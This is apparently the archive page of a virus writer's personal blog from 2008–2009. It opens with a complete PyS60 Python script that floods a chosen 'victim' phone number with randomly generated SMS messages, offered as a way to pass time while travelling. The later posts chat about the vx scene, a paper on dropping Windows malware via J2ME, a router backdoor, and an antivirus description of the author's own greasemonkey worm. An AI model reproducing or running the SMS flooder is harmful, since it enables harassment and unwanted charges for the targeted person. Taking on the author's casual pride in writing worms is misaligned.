Annoying stuff

April 11th, 2009

How to spend your time during a long travel:

# flood a victim telephone with random generated sms (for pys60)
import messaging
import appuifw
import random

def rnd():
return random.randint(97,97+26)

num=appuifw.query(u"telephone number?","text")
cnt=appuifw.query(u"how many?","number")

while abs(cnt)>0:
testo=chr(rnd())+chr(rnd())+chr(rnd())+chr(rnd())+chr(rnd())
messaging.sms_send(num,testo)
cnt=cnt-1
print "sent: "+testo

April 5th, 2009

I am still alive …

A bit of relax for me …

February 11th, 2009

After this hard session of exams I will come back with some new ideas and code … just one exam left!

Abusing of J2ME

November 30th, 2008

An interesting paper has been published on milw0rm.
It is about using the j2me framework to drop windows malwares …
The idea is cool and I think it can be improved and/or expanded.

Being busy…

November 19th, 2008

Is SPTH coming back to scene?

October 30th, 2008

SPTH has published a nice article on his site. Is he thinking to come back to vx scene?

Backdoor from my ISP

October 15th, 2008

An evil backdoor has been discovered in some ADSL routers given by Telecom Italia for the ADSL service called “alice”.  You can read all the details here.
Do they want to control us all?

A surprising thing …

September 29th, 2008

I have just got a worm in the last place where you can think that something like this can happen … in the university faculty of engineering where I study.

Here the beasty

News from AVerz

September 15th, 2008

I got a description for my greasemonkey worm.
It’s the first time that they write a full and good description for one of my virii…

Wasting time …

September 14th, 2008

I have just found a great open source real time strategy game called warzone2100 and now I am wasting all my time on it …
The start of university is very near for me…